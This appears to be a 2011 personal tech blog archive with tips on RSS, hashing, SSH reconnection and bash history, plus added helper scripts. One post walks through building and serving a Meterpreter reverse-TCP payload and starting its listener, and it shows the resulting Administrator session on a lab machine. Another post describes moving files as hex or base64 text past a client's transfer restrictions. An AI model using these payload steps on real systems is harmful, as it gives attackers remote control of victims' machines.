Friday, March 25, 2011

Major Experiment

I decided to delete all of my RSS feeds from google reader. I had over 60 subscriptions that I felt I needed to go through on a daily basis. Well recently, I discovered myself spending too much time on feeds. So, in response, I decided to delete them all to see how my productivity increases.

I have enough friends/chat channels so that I don't miss anything major that is happening in the field. I will edit this blog post with my thoughts/findings regarding this experiment :D

EDIT: So it's been less than 24h and I have already been discovering new blogs/reading on things I have been meaning to learn for a while now. I did decide to actually have 3 subscriptions on my reader though (IT'S NOT CHEATING I SWEAR). The subscriptions are xkcd, Questionable Content comic, and woot.com. I don't consider it cheating because those take all of 5 seconds to check and I check them regularly anyway.

Wednesday, March 23, 2011

Generate hashes

Here is a webpage that will generate many different hashes from text.
http://www.insidepro.com/hashes.php

I'm still looking for a program that will do that via the command line... I should probably just code it myself.
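Here is an added example of the "code it myself" version, written for this page and not part of the original post: a POSIX shell script that produces the same set of digests locally with the coreutils md5sum/sha*sum tools. Doing it locally also matters when the input is sensitive (a password you are checking against a leaked hash, for instance), since anything typed into a web form is sent to that site.

```shell
#!/bin/sh
# text_hash ALGO TEXT: hex digest of TEXT under ALGO, where ALGO is one of
# md5, sha1, sha224, sha256, sha384, sha512 (the coreutils *sum tools).
text_hash() {
    alg=$1
    text=$2
    # printf, not echo: echo appends a newline, which changes the digest
    printf '%s' "$text" | "${alg}sum" | cut -d ' ' -f 1
}

# all_hashes TEXT: one "algo: digest" line per algorithm, like the web form's output
all_hashes() {
    for algo in md5 sha1 sha224 sha256 sha384 sha512; do
        printf '%s: %s\n' "$algo" "$(text_hash "$algo" "$1")"
    done
}

# Demonstration on a constructed input (the classic test vector "abc")
all_hashes "abc"
```

Call `all_hashes 'your text'` from a script or `text_hash sha256 'your text'` for a single algorithm; the printf-without-newline detail is the usual reason a shell-computed digest disagrees with one from a web page.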

FCC ID Search

Hardware hackers will find this useful:
http://www.fcc.gov/oet/ea/fccid/

It's a webpage that will search the FCC database for the FCC ID you supply it. The results are publicly available files/photos/documentation that the manufacturer uploaded.

useful...

Wednesday, March 16, 2011

Learning yourself

Perhaps the best skill/hack you could possibly do is learning your own system.
How do you think?
Why do you think the way you do?
What motivates you?
What makes you lazy?
Why do you get angry at certain things? And what can you do to recognize and stop it?
What makes you, you?

Most people will go their entire lives without understanding themselves, and will inherently become their own slaves. But, I firmly believe this one statement:

A man who is God of himself, is a God to others.

There is no large leap, or epiphany, that can cause you to fully understand yourself. It all comes in small parts, small epiphanies, specific and detailed. A good example is what happened to me today. I realized that trying to prioritize multiple items that have multiple levels of importance can mess with my head; therefore, knocking out the simpler, quicker tasks first allows me to only have to worry about a smaller number of items. Now that I have reduced my amount of items from 10 to 3, I only have to devote my attention to 3 items, which is MUCH easier to handle than 10 different things at once.

May seem very simple and obvious, but when something like that changes how you manage your time, you become more efficient, and have more time to do other things.

It's just a little philosophy that I thought I would impart to anyone who's interested.

Thursday, March 10, 2011

Auto restart your SSH connection

Here is a simple bash one-liner that will automatically restart your ssh connection if it drops.

while true; do ssh user@server.com; sleep 15; done

It's simple: this will run until killed. The first thing the loop does is start up ssh, and since it can't continue until ssh exits, it's effectively a method to always restart the connection (without duplicating the process).

This assumes you have key auth set up and ready to go.
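The one-liner reconnects unconditionally, so typing "exit" at the remote prompt just gets you a fresh session and you have to Ctrl-C during the sleep to escape. The following is an added example (not from the original post) that keeps the same loop but stops on a clean exit, retries only on failure, and gives up after a bounded number of attempts. The `flaky_connect` function is a constructed stand-in for `ssh user@server.com` so the loop can be exercised without a server.

```shell
#!/bin/sh
# keep_alive MAX_TRIES DELAY CMD [ARGS...]
# Runs CMD and returns 0 as soon as it exits cleanly (status 0, e.g. you typed
# "exit" at the remote prompt), so an intentional logout ends the loop instead
# of reconnecting. Any other status (ssh reports a dropped or refused
# connection as 255) is retried after DELAY seconds, up to MAX_TRIES
# consecutive failures, after which the last failure status is returned.
keep_alive() {
    max=$1
    delay=$2
    shift 2
    tries=0
    while :; do
        "$@" && return 0
        status=$?
        tries=$((tries + 1))
        if [ "$tries" -ge "$max" ]; then
            return "$status"
        fi
        sleep "$delay"
    done
}

# flaky_connect: constructed stand-in for "ssh user@server.com" so the loop can
# be exercised offline. It fails with 255 (ssh's connection-error status) on the
# first two calls and succeeds on the third, like a link that comes back after
# a drop.
FLAKY_CALLS=0
flaky_connect() {
    FLAKY_CALLS=$((FLAKY_CALLS + 1))
    [ "$FLAKY_CALLS" -ge 3 ] || return 255
}

# Real use would be: keep_alive 20 15 ssh user@server.com
# Offline demonstration: reconnects twice, then returns 0 on the third attempt.
keep_alive 5 1 flaky_connect
echo "connected after $FLAKY_CALLS attempt(s), status $?"
```

Because ssh returns the remote shell's exit status on a normal logout and 255 on its own errors, the "stop on 0, retry otherwise" rule is enough to tell the two apart without parsing any output.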

TIGERBLOOD

Tuesday, March 8, 2011

Create file from hex dump

So I'm working on a client and they have the most restrictive traffic rules I've ever seen. I can't transfer any files whatsoever. I figured out I could do this today:

1. xxd NameOfFile
2. copy the output
3. paste it into a file
4. xxd -r file file1
5. open with respective program

Basically what is happening is that you are generating the hex code via xxd and regenerating the binary via xxd -r.

This effectively allows you to transfer files when all you can do is run commands on them.

fuck yeah this makes my life easier.

EDIT: lol I totally forgot turning binaries into text was THE job of the base64 encoding algorithm. So it's basically the same steps but with base64...

1. base64 filename
2. copypasta into another file
3. base64 -d newfilename > filename
4. open with respective program

the base64 program has the added benefit of having less to copy/paste over.
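One thing the copy/paste steps above do not give you is any proof that the bytes arrived intact (a terminal that wraps or drops a line leaves you with a file that simply fails to open). The script below is an added example, not the post's own commands: it uses base64 (the smaller paste) and prefixes the blob with a SHA-256 of the original so the receiving side can verify the copy before trusting it. The sample file is constructed inline with NUL and 0xFF bytes, which is exactly what a plain paste of a raw binary would mangle.

```shell
#!/bin/sh
# pack FILE: print a pasteable text blob for FILE. Line 1 is the SHA-256 of the
# original bytes, the rest is the base64 body; the digest lets the other side
# prove the paste arrived complete and unmodified before opening the file.
pack() {
    sha256sum < "$1" | cut -d ' ' -f 1
    base64 < "$1"
}

# unpack BLOB OUT: rebuild OUT from a blob written by pack, then verify it.
# Returns 1 and removes OUT if the base64 is malformed or the digest differs.
unpack() {
    expected=$(head -n 1 "$1")
    if ! tail -n +2 "$1" | base64 -d > "$2" 2>/dev/null; then
        rm -f "$2"
        return 1
    fi
    actual=$(sha256sum < "$2" | cut -d ' ' -f 1)
    if [ "$expected" != "$actual" ]; then
        rm -f "$2"
        return 1
    fi
}

# roundtrip_ok FILE: 0 if FILE survives pack -> paste -> unpack byte for byte.
roundtrip_ok() {
    workdir=$(mktemp -d)
    pack "$1" > "$workdir/blob.txt"
    unpack "$workdir/blob.txt" "$workdir/copy"
    rc=$?
    rm -rf "$workdir"
    return "$rc"
}

# Demonstration on a constructed file containing non-text bytes (NUL, 0xFF).
SAMPLE=$(mktemp)
printf 'constructed binary\000\001\002\377payload\n' > "$SAMPLE"
if roundtrip_ok "$SAMPLE"; then
    echo "round trip verified"
fi
```

Seen from the other side of the traffic rules, this is also why a "commands only, no file transfer" policy is not a data-transfer control: long base64 or hex blobs in a recorded session or clipboard log are the thing to alert on.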

Saturday, March 5, 2011

Simple meterpreter call back payload

The following commands, in order, build a binary containing a meterpreter payload; when the target system runs it, it connects back to the listener.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.166 X > /var/www/rawr.exe

What's happening here? Well, the first thing we are doing is generating the actual payload that the victim will execute. Note: we are not actually exploiting any vulnerability here; this binary simply contains the meterpreter reverse TCP connect payload (windows/meterpreter/reverse_tcp). You have to set LHOST to the actual listening box (I know, counterintuitive). X is the shortcut to "exploit" in metasploit. Normally msfpayload outputs the binary contents to stdout so you can redirect it wherever you want; here I just redirect it to rawr.exe in my web root directory so I can download it via a web browser.

What happens now (once I start apache) is I go to the victim machine and type "http://192.168.1.166/rawr.exe" in order to download it. Once downloaded, I run it.
NOTE===============
You need to run the following command before you run the windows binary (otherwise it will connect to nothing and you will have to re-execute the binary)

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E

This command starts up metasploit with the arguments as conditions. msf will start the multi handler to listen for the connection; the rest of the arguments are the same as in the msfpayload command. *now run the windows payload*

What should happen is you get this:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.166 E
[*] Please wait while we load the module tree...

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|


=[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 340 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11879 updated today (2011.03.05)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.166
[*] Started reverse handler on 192.168.1.166:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.193
[*] Meterpreter session 1 opened (192.168.1.166:4444 -> 192.168.1.193:1393) at Sat Mar 05 02:22:40 -0500 2011

meterpreter > getuid
Server username: WINXP\Administrator

Figure out what alias to create

A simple bash one-liner that will read through your bash history and print out your most typed binaries:

history | cut -d ' ' -f 5 | sort | uniq -c | sort -n
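The `cut -f 5` trick depends on how many leading spaces `history` pads its line numbers with, and it counts `sudo` or `VAR=value` as the command rather than the binary behind them. As an added example (not from the original post), here is the same idea over a saved history file (`~/.bash_history` format: one command per line, no numbers), with those prefixes unwrapped. The sample history is constructed inline. The same count over a recovered history file is also a quick way to baseline what an account normally runs when reviewing a compromised host.

```shell
#!/bin/sh
# top_commands HISTFILE [N]: count the first word of each line in a saved history
# file and print the N most frequent as "count command". Leading "sudo" and
# VAR=value assignments are skipped so the real binary is counted, and the
# "#1300000000" timestamp lines written by HISTTIMEFORMAT are ignored.
top_commands() {
    n=${2:-10}
    grep -v '^#' "$1" | awk '
        {
            i = 1
            while (i <= NF && ($i == "sudo" || $i ~ /^[A-Za-z_][A-Za-z0-9_]*=/)) i++
            if (i <= NF) count[$i]++
        }
        END { for (c in count) print count[c], c }
    ' | sort -rn | head -n "$n"
}

# Constructed sample history, not a real user's file
HIST_SAMPLE=$(mktemp)
cat > "$HIST_SAMPLE" <<'EOF'
#1299300000
ls -la
cd /var/log
sudo tail -f auth.log
git status
ls
LANG=C sort names.txt
ls /tmp
git diff
sudo ls /root
EOF

# Example run: the three most used binaries in the sample
top_commands "$HIST_SAMPLE" 3
```

Run it against your own file with `top_commands ~/.bash_history 15`; whatever sits at the top of the list with a long argument string is the alias worth creating.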